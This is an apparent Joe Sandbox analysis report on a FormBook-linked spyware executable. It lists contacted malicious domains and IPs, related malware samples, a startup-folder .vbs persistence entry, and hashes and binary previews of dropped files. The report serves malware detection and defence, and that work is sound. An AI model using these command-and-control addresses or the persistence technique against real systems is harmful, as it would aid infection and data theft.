http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 | true | Avira URL Cloud: malware | unknown
http://www.medicaresbasics.xyz/fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.meliorahomes.net | LHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
8.217.17.192 | www.meliorahomes.net | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
3.33.130.190 | medicaresbasics.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1588079
                                                Start date and time:2025-01-10 21:04:54 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 28s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:25Lz840Dmh.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@14/11@4/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 67
                                                • Number of non-executed functions: 271
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: 25Lz840Dmh.exe
Time | Type | Description
16:20:34 | API Interceptor | 55519x Sleep call for process: mobsync.exe modified
21:05:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
8.217.17.192 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.meliorahomes.net/ir1u/
8.217.17.192 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.meliorahomes.net/ir1u/
8.217.17.192 | H1CYDJ8LQe.exe | malicious | FormBook | www.meliorahomes.net/y4rz/
8.217.17.192 | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | www.meliorahomes.net/x0tl/
8.217.17.192 | shipping documents_pdf.exe | malicious | FormBook | www.meliorahomes.net/v6hi/
3.33.130.190 | WyGagXWAfb.exe | malicious | FormBook | www.virtusign.info/69j2/
3.33.130.190 | bkTW1FbgHN.exe | malicious | FormBook | www.ampsamkok88.shop/d5ko/
3.33.130.190 | KcSzB2IpP5.exe | malicious | FormBook | www.champs-cloud.systems/kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P
3.33.130.190 | zE1VxVoZ3W.exe | malicious | FormBook | www.emirates-visa.net/lnrv/
3.33.130.190 | janacourse2.1.exe | malicious | FormBook | www.energyecosystem.app/hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE
3.33.130.190 | pbfe2Xcxue.exe | malicious | Pony | onecable.ca/forum/viewtopic.php
3.33.130.190 | RtU8kXPnKr.exe | malicious | Quasar | freegeoip.net/xml/
3.33.130.190 | file.exe | malicious | FormBook | www.emi.wtf/gd04/?uvC=N20YWnVHT5RQC6WMyDV2V8c+DcGptM14OKih1BJNLsVd899Y1bUoCinKVTGhqICNh0dB&UlPxR=-Z1dwda8VP90AL
3.33.130.190 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.medicaresbasics.xyz/fm31/
3.33.130.190 | 236236236.elf | malicious | Unknown | lojasdinastia.com.br/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
www.meliorahomes.net | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | H1CYDJ8LQe.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | rInvoiceCM60916_xlx.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | 8.217.17.192
www.meliorahomes.net | shipping documents_pdf.exe | malicious | FormBook | 8.217.17.192
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZONEXPANSIONGB | https://patiooutletmaipu.cl/tiendas/head/ | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | 3.33.155.121
AMAZONEXPANSIONGB | WyGagXWAfb.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | bkTW1FbgHN.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | KcSzB2IpP5.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | zE1VxVoZ3W.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | http://www.lpb.gov.lr | malicious | CAPTCHA Scam ClickFix | 3.33.155.121
AMAZONEXPANSIONGB | https://we.tl/t-fnebgmrnYQ | malicious | Unknown | 3.33.220.150
AMAZONEXPANSIONGB | http://www.singhs.lv | malicious | CAPTCHA Scam ClickFix | 3.33.155.121
AMAZONEXPANSIONGB | http://www.jmclmedia.ph | malicious | Unknown | 3.33.148.61
AMAZONEXPANSIONGB | https://sanctionssearch.ofac.treas.gov | malicious | Unknown | 108.175.50.40
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | NWPZbNcRxL.exe | malicious | FormBook | 47.254.140.255
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | FIWszl1A8l.exe | malicious | GhostRat | 8.217.85.20
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 5.elf | malicious | Unknown | 8.209.177.126
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 2873466535874-68348745.02.exe | malicious | Unknown | 8.217.59.222
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://199.188.109.181 | malicious | Unknown | 47.254.187.72
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Fantazy.sh4.elf | malicious | Unknown | 8.214.203.178
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 6.elf | malicious | Unknown | 8.222.188.75
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Benefit_401k_2025_Enrollment.pdf | malicious | Unknown | 47.246.158.153
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 123.exe | malicious | Metasploit | 47.90.142.15
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | arm7.elf | malicious | Mirai | 8.222.72.249
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):1169920
                                                Entropy (8bit):7.147712317212054
                                                Encrypted:false
                                                SSDEEP:24576:Wu6J33O0c+JY5UZ+XC0kGso6Fa+bh6PgHDpASu6iBf/1RvYB+WY:4u0c++OCvkGs9Fa+b3DSZ6wf/1AY
                                                MD5:6C35B069B37095A1788E5C7B51A60E97
                                                SHA1:3B36EF6C51BB8094729BAE419675A2AA21BC6D23
                                                SHA-256:232ABA52F171FEFBB08CDF88D9FAFC571394CF8EC159081D5F9CAD2EA2F7669C
                                                SHA-512:06E30105A7CEFD397D1C436C9EEC0D477FE505475054CB8E2D8E977E6959FA600DBDC6895C76BBDA330AF742BEC54F0EED477FAA40B869DDA45E41F183C23854
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...}vZg.........."..................}............@..........................P....../(....@...@.......@.....................L...|....p..LQ.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...LQ...p...R..................@..@.reloc...q.......r...h..............@..B........................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Reputation:low
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11014
                                                Entropy (8bit):7.475114923747301
                                                Encrypted:false
                                                SSDEEP:192:4bF9LYUdWsxmCXGOqRtSPHMrWDKaB6m02bkgrNAhijaHvu3h3Y:4bF9LQsX1PsTa/kbGp3ho
                                                MD5:94607DCF1DCEE63983D98EF6CA8682EF
                                                SHA1:0EF13AC203B5F2368C5DEA48BBB4BE458A05D3DD
                                                SHA-256:EF86BAB30ECD03073A26D7950B278C2720A54FFCB5B019B6B935EC634B6DB727
                                                SHA-512:F7CF2EC7B652464BC7CC0C7C9224A06098A400FE8E1B1E758FD8291C0266F97E04F02668D91319C004C7A4A7B7F0DBDDEE382A6AED0CB1EF866A006CB03DBA3B
                                                Malicious:false
                                                Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:ASCII text, with very long lines (29698), with no line terminators
                                                Category:modified
                                                Size (bytes):29698
                                                Entropy (8bit):3.535048592449354
                                                Encrypted:false
                                                SSDEEP:384:cdhx4G/Yxkn3vnSWuiCnF8fNfwdvT/gcvR21W486yRv6Itdps8MpIZbQF1aFNjPF:ZG/4k3vA/FYYdvzgcp4W6Itdph8F8/1H
                                                MD5:CC90C7B76241E3C46718FDF4B998C9DA
                                                SHA1:011AA6B45312C833D2F6B8BE0295F3E339C4F4B0
                                                SHA-256:F098273F5E95E608CF58181CE955F2FCF1D59C0C21C9178A9748B2E48B62B615
                                                SHA-512:9E73C36C589E6C60A0CBE69506FA989D71B330236CC66A7015FC8643F7974493F29D0E61C83AECD02B6FB6F1C66A7643F80FD551C97B3CF4A26F40D7A967DDB5
                                                Malicious:false
                                                Process:C:\Windows\SysWOW64\mobsync.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:modified
                                                Size (bytes):196608
                                                Entropy (8bit):1.1215420383712111
                                                Encrypted:false
                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
